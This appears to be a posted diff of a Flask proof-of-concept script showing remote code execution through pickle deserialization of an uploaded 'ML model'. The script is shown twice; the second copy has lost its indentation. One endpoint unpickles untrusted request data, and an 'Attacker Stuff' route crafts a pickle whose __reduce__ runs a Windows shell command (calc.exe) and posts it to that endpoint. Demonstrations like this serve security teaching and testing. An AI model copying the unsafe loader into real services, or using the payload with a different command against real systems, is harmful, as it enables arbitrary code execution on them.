moohax · October 19, 2020 03:28
diff --git a/cereal_web.py b/cereal_web.py
 import pickle
 import base64
 import requests
 from flask import Flask, request

 app = Flask(__name__)

 ## Start the server and go to 127.0.0.1:5000/exec ##


 ## API Endpoint ##
 @app.route('/load_model', methods=['POST'])
 def load_model():
    model_data = base64.urlsafe_b64decode(request.data)
    model = pickle.loads(model_data)
    
    if model:
        return "Success!"
      
 ## Attacker Stuff ##
 @app.route('/exec')
 def lazy_exec():
    # Create a class - represents a serialized model on disk.
    class MLModel():
        def __reduce__(self):
            import os
            execution = 'cmd.exe /c calc.exe'
            return (os.popen, (execution,))
    
    # Serialize it. 
    payload = base64.urlsafe_b64encode(pickle.dumps(MLModel()))
    
    # Ship it.
    requests.post('http://127.0.0.1:5000/load_model', data=payload)
    return '[+] Posted to load model'
    
 app.run()
	import pickle
	import base64
	import requests
	from flask import Flask, request

	app = Flask(__name__)

	## Start the server and go to 127.0.0.1:5000/exec ##


	## API Endpoint ##
	@app.route('/load_model', methods=['POST'])
	def load_model():
	model_data = base64.urlsafe_b64decode(request.data)
	model = pickle.loads(model_data)

	if model:
	return "Success!"

	## Attacker Stuff ##
	@app.route('/exec')
	def lazy_exec():
	# Create a class - represents a serialized model on disk.
	class MLModel():
	def __reduce__(self):
	import os
	execution = 'cmd.exe /c calc.exe'
	return (os.popen, (execution,))

	# Serialize it.
	payload = base64.urlsafe_b64encode(pickle.dumps(MLModel()))

	# Ship it.
	requests.post('http://127.0.0.1:5000/load_model', data=payload)
	return '[+] Posted to load model'

	app.run()